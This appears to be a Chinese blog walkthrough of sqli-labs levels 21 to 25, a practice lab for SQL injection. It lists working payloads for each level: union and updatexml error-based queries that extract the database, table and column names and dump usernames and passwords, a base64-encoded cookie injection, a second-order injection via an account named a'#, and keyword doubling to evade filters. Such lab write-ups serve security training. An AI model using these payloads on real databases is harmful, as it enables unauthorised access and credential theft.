Sqli-labs-master的21—25通关教程

目录

Less-21('闭合)

查询数据库名

查询数据库中的表

查询表中字段名

查询表中数据

Less-22("闭合)

查询数据库名

查询数据库中的表

查询表中字段名

查询表中数据

Less-23

查询数据库名

查询数据库中的表

查询表中字段名

查询表中数据

Less-24(二次注入)

Less-25

查询数据库名

查询数据库中的表

查询表中字段名

查询表中数据


Less-21('闭合)

登录成功后发现cookie可以显示出来,但是是乱码

登录成功后显示的页面中cookie是一串看不懂的字符, 看了后端代码后发现,是因为这里被编码过了, 那么抓包后修改cookie的值并进行 base64 编码

查询数据库名

sql 复制代码
') union select 1,2,database() #

查询数据库中的表

sql 复制代码
') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #

查询表中字段名

sql 复制代码
') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1) #

查询表中数据

sql 复制代码
') and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users),0x7e),1) #

Less-22("闭合)

查询数据库名

sql 复制代码
" union select 1,2,database() #

查询数据库中的表

sql 复制代码
" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #

查询表中字段名

sql 复制代码
" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1) #

查询表中数据

sql 复制代码
" and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users),0x7e),1) #

Less-23

直接在 URL 后面构造语句

查询数据库名

sql 复制代码
-1' union select 1,database(),3 and '1' = '1

查询数据库中的表

sql 复制代码
-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 or '1'='1

查询表中字段名

sql 复制代码
-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 or '1'='1

查询表中数据

sql 复制代码
-1' union select 1,(select group_concat(username,0x7e,password) from users),3 or '1'='1

Less-24(二次注入)

注册一个用户名 a 密码 123123 的用户

登录发现登录成功

查询数据库中的表的内容发现写入进去了

注册一个 a'# 的账户

登录上去用错误的密码修改

发现修改成功,用修改后的密码登录,发现登录成功

说明二次注入成功

Less-25

查询数据库名

sql 复制代码
-2' union select 1,2,database() --+

查询数据库中的表

sql 复制代码
-2' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security' --+

查询表中字段名

sql 复制代码
-2' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema='security' aandnd table_name='users' --+

查询表中数据

sql 复制代码
-1'union select 1,group_concat(username,0x3a,passwoorrd),3 from users --+
相关推荐
我真的是大笨蛋8 分钟前
K8S-Pod(上)
java·云原生·容器·kubernetes
jllws121 分钟前
数据库原理及应用_数据库管理和保护_第5章数据库的安全性_理论部分
数据库
纪元A梦31 分钟前
贪心算法应用:数字孪生同步问题详解
java·算法·贪心算法
Micrle_00743 分钟前
java分布式场景怎么实现一个高效的 读-写锁
java·分布式
2302_809798321 小时前
【Redis】缓存的穿透、击穿和雪崩
数据库·redis·缓存
海上生明月丿1 小时前
微服务01
java·spring boot·微服务
coooliang2 小时前
【鸿蒙 NEXT】V1迁移V2状态管理
java·前端·harmonyos
Luke Ewin2 小时前
FunASR的Java实现Paraformer实时语音识别 | 一款无需联网的本地实时字幕软件
java·人工智能·语音识别·asr·funasr·paraformer·sensevoice
叫我阿柒啊2 小时前
从Java全栈到前端框架的全面实战:一次真实面试的深度解析
java·spring boot·缓存·微服务·消息队列·vue3·rest api